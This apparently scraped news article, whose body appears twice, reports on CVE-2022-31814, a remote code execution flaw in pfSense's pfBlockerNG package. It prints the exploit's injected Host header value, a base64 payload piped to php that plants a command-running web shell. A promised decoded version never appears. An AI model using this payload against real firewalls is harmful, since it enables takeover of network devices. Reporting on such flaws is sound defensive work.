Open Source Firewall pfsense Vulnerable to Remote Code Execution Attacks
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
A popular open-source firewall software pfSense vulnerability has been identified, allowing for remote code execution (RCE) attacks.
The vulnerability, tracked as CVE-2022-31814, highlights potential risks in pfSense installations, particularly those using the pfBlockerNG package.
pfSense is a widely used, FreeBSD-based firewall and router software that offers enterprise-grade features and security. It is renowned for its flexibility and open-source nature, allowing users to configure robust network defenses through a web interface.
Identification of the Vulnerability
According to the laburity report, the vulnerability was uncovered during a routine security audit of a pfSense application. Initial attempts to exploit the system using default credentials proved unsuccessful.
However, further investigation revealed that the pfBlockerNG package was installed, leading researchers to test known exploits against it.
The exploit attempts initially failed, prompting a deeper dive into the root cause. Researchers discovered that while the system was vulnerable to RCE, the existing exploit scripts failed due to discrepancies in the Python and PHP versions installed on the target machine.
CVE-2022-31814 – Exploit Debugging
The debugging process revealed that the failure of the exploit was due to the absence of Python 3.8 on the target system, which was required by the exploit script. Additionally, issues in the PHP code were identified, necessitating modifications to the script.
Researchers successfully executed commands on the target server by adapting the exploit to work with Python 2 and adjusting the PHP code. The exploit in the source code looks like this:
"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"
If we just base64 decode the string, we will get the value as:
#Cyber_Security #Cyber_Security_News #Vulnerability #cyber_security #cyber_security_news #vulnerability
Оригинальная версия на сайте:
Open Source Firewall pfsense Vulnerable to Remote Code Execution Attacks
Author: DhivyaA popular open-source firewall software pfSense vulnerability has been identified, allowing for remote code execution (RCE) attacks.
The vulnerability, tracked as CVE-2022-31814, highlights potential risks in pfSense installations, particularly those using the pfBlockerNG package.
pfSense is a widely used, FreeBSD-based firewall and router software that offers enterprise-grade features and security. It is renowned for its flexibility and open-source nature, allowing users to configure robust network defenses through a web interface.
Identification of the Vulnerability
According to the laburity report, the vulnerability was uncovered during a routine security audit of a pfSense application. Initial attempts to exploit the system using default credentials proved unsuccessful.
However, further investigation revealed that the pfBlockerNG package was installed, leading researchers to test known exploits against it.
The exploit attempts initially failed, prompting a deeper dive into the root cause. Researchers discovered that while the system was vulnerable to RCE, the existing exploit scripts failed due to discrepancies in the Python and PHP versions installed on the target machine.
CVE-2022-31814 – Exploit Debugging
The debugging process revealed that the failure of the exploit was due to the absence of Python 3.8 on the target system, which was required by the exploit script. Additionally, issues in the PHP code were identified, necessitating modifications to the script.
Researchers successfully executed commands on the target server by adapting the exploit to work with Python 2 and adjusting the PHP code. The exploit in the source code looks like this:
"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"
If we just base64 decode the string, we will get the value as:
#Cyber_Security #Cyber_Security_News #Vulnerability #cyber_security #cyber_security_news #vulnerability
Оригинальная версия на сайте:
